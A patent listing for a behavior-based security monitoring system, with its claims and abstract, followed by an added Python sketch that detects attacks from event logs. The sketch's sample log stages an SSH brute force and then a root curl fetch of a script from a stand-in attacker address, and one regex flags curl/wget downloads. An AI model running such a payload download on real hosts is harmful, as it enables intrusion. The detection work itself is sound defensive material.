Analytics-based security monitoring system and method
First Claim
1. An analytics-based security monitoring system comprising:
at least one memory to store instructions; and
a hardware processor communicatively coupled to the at least one memory, the hardware processor, when executing the instructions, to:
receive information collected from at least one computing node in a computing environment,
detect a first plurality of behavioral characteristics from behavioral data in the received information, each of the first plurality of behavioral characteristics representing an action conducted in the computing environment,
determine one or more behavioral fragments, each of the one or more behavioral fragments comprises a second plurality of behavioral characteristics having a level of relevance to each other that is computed based, at least in part, on one or more of (i) whether the second plurality of behavioral characteristics occur within a prescribed window of time or (ii) whether the second plurality of behavioral characteristics are detected on a single computing node or different computing nodes of the at least one computing node,
correlate the one or more determined behavioral fragments against an attack profile comprising a plurality of sets of behavioral fragments where each set of behavioral fragments forms a malicious behavior pattern of a known attack,
identify an attack based on the correlated one or more determined behavioral fragments, and
perform one or more remedial actions when the attack is identified.
5 Assignments
0 Petitions
Abstract
An analytics-based security monitoring system includes instructions that may be executed by a computing system to receive data in the form of event logs from one or more network devices transferred through a computing environment, detect a plurality of behavioral characteristics from the received event logs, identify behavioral fragments composed of related behavioral characteristics, and identify an attack by correlating the behavioral fragments against patterns of known malicious attacks. The analytics-based security monitoring system may then perform a learning process to enhance further detection of attacks and perform one or more remedial actions when an attack is identified.
284 Citations
25 Claims
1. An analytics-based security monitoring system comprising: (full text as given under First Claim above)
Dependent claims: 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12
13. An analytics-based security monitoring method comprising:
receiving, using an operations management application with instructions stored on a non-transitory medium and executed on at least one processor, information collected from at least one computing node in a computing environment;
detecting, using the instructions, a plurality of behavioral characteristics from the received information, each of the plurality of behavioral characteristics representing an action conducted in the computing environment;
identifying, using the instructions, at least one behavioral fragment comprising one or more of the detected behavioral characteristics that are related by correlating the behavioral characteristics against a correlation profile including information associated with a set of behavioral characteristics that form a behavior pattern, the related behavioral characteristics are determined based, at least in part, on (i) whether the behavioral characteristics occur within a prescribed window of time or (ii) whether the behavioral characteristics are detected on a single computing node or different computing nodes of the at least one computing node;
identifying, using the instructions, an attack comprising the at least one behavioral fragment by correlating the at least one behavioral fragment against an attack profile including information associated with a set of behavioral fragments that form an attack pattern; and
performing, using the instructions, one or more remedial actions when the attack is identified, the one or more remedial actions including reporting the attack.
Dependent claims: 14, 15, 16, 17, 18, 19, 20
21. A security monitoring system comprising:
a security monitoring framework stored in at least one memory and executed on at least one processor of a computing system, the security monitoring framework comprising:
a behavioral characteristic detection module that, when executed by the at least one processor, analyzes data in an event log to detect a plurality of behavioral characteristics from the event log data collected from at least one computing node in a computing environment, each of the plurality of behavioral characteristics representing an action conducted in the computing environment;
a behavioral fragment determination module that, when executed by the at least one processor, correlates a first of the detected behavioral characteristics against at least one other of the detected behavioral characteristics, and a second of the detected behavioral characteristics against at least one other of the detected behavioral characteristics, using a correlation profile to identify thereby respective first and second behavioral fragments, the correlation profile includes factors including whether the first of the detected behavioral characteristics and the at least one other of the detected behavioral characteristics occur within a prescribed period of time;
an attack identification module that, when executed by the at least one processor, identifies an attack by correlating the first and second behavioral fragments against an attack profile including information associated with a plurality of sets of behavioral fragments that each form a malicious behavior pattern of the attack; and
a remedial action generation module that, when executed by the at least one processor, performs one or more remedial actions when the attack is identified.
Dependent claims: 22, 23, 24
25. Computer program product code implemented in a non-transitory, computer readable medium that when executed by at least one processor, is operable to perform at least the following:
receiving, using an operations management application with instructions stored on a non-transitory medium and executed on at least one processor, information collected from at least one computing node in a computing environment;
detecting, using the instructions, a plurality of behavioral characteristics from the received information, each of the plurality of behavioral characteristics representing an action conducted in the computing environment;
determining, using the instructions, a behavioral fragment by correlating a first of the detected behavioral characteristics against at least one other detected behavioral characteristic, and a second of the detected behavioral characteristics against at least one other of the detected behavioral characteristics, using a correlation profile to thereby identify respective first and second behavioral fragments, the correlation profile includes factors including whether the first of the detected behavioral characteristics and the at least one other detected behavioral characteristic occur within a prescribed period of time;
identifying, using the instructions, an attack by correlating the first and second behavioral fragments against an attack profile including information associated with a plurality of sets of behavioral fragments that each form a malicious behavior pattern of the attack; and
performing, using the instructions, one or more remedial actions when the attack is identified.
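The pipeline the abstract and claims 1 and 13 describe (event log to behavioral characteristics, characteristics grouped into fragments by a time window and node locality, fragments matched against an attack profile holding several fragment sets, then a remedial action) can be sketched in working code. The following Python is an added example written for this page; it is not code from the patent or its assignee. The regex detectors, the profile and fragment names, the window sizes, and the sample log lines are all constructed assumptions chosen to exercise each stage; a real engine would carry far more detectors and would keep every candidate fragment combination rather than the single earliest one per name used here.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from typing import NamedTuple
import re

# Constructed sample event logs (syslog-like); not taken from the patent.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z host-a sshd: Failed password for root from 203.0.113.9
2024-05-01T10:00:03Z host-a sshd: Failed password for root from 203.0.113.9
2024-05-01T10:00:40Z host-a sshd: Accepted password for root from 203.0.113.9
2024-05-01T10:01:10Z host-a sudo: root : COMMAND=/usr/bin/curl http://203.0.113.9/x.sh
2024-05-01T10:02:00Z host-b sshd: Accepted publickey for svc from 10.0.0.5
"""
# The same failures spread over an hour fall outside the fragment window: no attack.
SPREAD_LOG = """\
2024-05-01T09:00:00Z host-c sshd: Failed password for root from 198.51.100.7
2024-05-01T09:30:00Z host-c sshd: Failed password for root from 198.51.100.7
2024-05-01T10:00:30Z host-c sshd: Accepted password for root from 198.51.100.7
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<node>\S+) (?P<msg>.*)$")
# Hypothetical detectors: message pattern -> behavioral characteristic kind.
DETECTORS = [
    (re.compile(r"sshd: Failed password for (?P<user>\S+) from (?P<src>\S+)"), "auth_failure"),
    (re.compile(r"sshd: Accepted \w+ for (?P<user>\S+) from (?P<src>\S+)"), "auth_success"),
    (re.compile(r"sudo: (?P<user>\S+) : COMMAND=\S*/(?:curl|wget) (?P<src>\S+)"), "remote_fetch"),
]

# Characteristic = one observed action; Fragment = related characteristics grouped by a
# correlation profile whose relevance criteria are claim 1's (i) time window and (ii) node locality.
Characteristic = NamedTuple("Characteristic", [("ts", datetime), ("node", str), ("kind", str), ("attrs", tuple)])
Fragment = NamedTuple("Fragment", [("profile", str), ("start", datetime), ("end", datetime), ("nodes", frozenset), ("members", tuple)])
CorrelationProfile = NamedTuple("CorrelationProfile", [("name", str), ("required", frozenset), ("min_count", dict), ("window", timedelta), ("same_node", bool)])
AttackProfile = NamedTuple("AttackProfile", [("name", str), ("patterns", list), ("window", timedelta)])

CORRELATION_PROFILES = [
    CorrelationProfile("brute_force_then_login", frozenset({"auth_failure", "auth_success"}),
                       {"auth_failure": 2}, timedelta(seconds=120), same_node=True),
    CorrelationProfile("privileged_remote_fetch", frozenset({"auth_success", "remote_fetch"}),
                       {}, timedelta(seconds=300), same_node=True),
]
# An attack profile holds several fragment sets; any complete set is a known malicious pattern.
ATTACK_PROFILES = [AttackProfile("ssh_bruteforce_payload_fetch", [
    frozenset({"brute_force_then_login", "privileged_remote_fetch"}),  # full pattern
    frozenset({"brute_force_then_login"}),  # weaker variant: successful brute force alone
], timedelta(minutes=10))]

def detect_characteristics(log_text):
    found = []
    for m in filter(None, map(LINE_RE.match, log_text.splitlines())):
        ts = datetime.fromisoformat(m["ts"].replace("Z", "+00:00"))
        for pattern, kind in DETECTORS:
            if hit := pattern.search(m["msg"]):  # first matching detector wins
                found.append(Characteristic(ts, m["node"], kind, tuple(sorted(hit.groupdict().items()))))
                break
    return sorted(found, key=lambda c: c.ts)

def determine_fragments(chars, profiles):
    fragments = []
    for p in profiles:
        groups = defaultdict(list)  # criterion (ii): per node, or one environment-wide group
        for c in chars:
            groups[c.node if p.same_node else "*"].append(c)
        for group in groups.values():
            i = 0
            while i < len(group):
                anchor = group[i]  # criterion (i): everything within p.window after the anchor
                window = [(j, c) for j, c in enumerate(group[i:], i) if c.ts - anchor.ts <= p.window]
                counts = Counter(c.kind for _, c in window)
                if all(counts[k] >= p.min_count.get(k, 1) for k in p.required):
                    members = [(j, c) for j, c in window if c.kind in p.required]
                    fragments.append(Fragment(p.name, members[0][1].ts, members[-1][1].ts,
                                              frozenset(c.node for _, c in members), tuple(c for _, c in members)))
                    i = members[-1][0] + 1  # consume these; never re-anchor inside a fragment
                else:
                    i += 1
    return fragments

def identify_attacks(fragments, attack_profiles):
    by_name = defaultdict(list)
    for f in fragments:
        by_name[f.profile].append(f)
    attacks = []
    for ap in attack_profiles:
        for pattern in ap.patterns:  # first fully present set within the attack window wins
            if all(by_name[n] for n in pattern):
                chosen = [min(by_name[n], key=lambda f: f.start) for n in sorted(pattern)]
                if max(f.end for f in chosen) - min(f.start for f in chosen) <= ap.window:
                    attacks.append((ap.name, tuple(chosen)))
                    break
    return attacks

def remediate(attacks):
    # Remedial action (claim 13 names reporting): one report per identified attack.
    return [{"action": "report", "attack": name,
             "nodes": sorted(set().union(*(f.nodes for f in frags))),
             "indicators": sorted({dict(c.attrs).get("src") for f in frags for c in f.members} - {None})}
            for name, frags in attacks]

def run_pipeline(log_text):
    chars = detect_characteristics(log_text)
    return remediate(identify_attacks(determine_fragments(chars, CORRELATION_PROFILES), ATTACK_PROFILES))
```

On SAMPLE_LOG the host-a lines form both fragments and the full attack pattern is reported with the source address and the fetched URL as indicators, while the host-b login never joins a fragment because the profiles group per node. On SPREAD_LOG the identical characteristics produce no fragment, since the 120-second window is the relevance test. That is also the caveat: a purely time-windowed relevance measure is easy to pace around, so production profiles usually combine the window with identity (same user, same source address) rather than relying on timing alone.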
Specification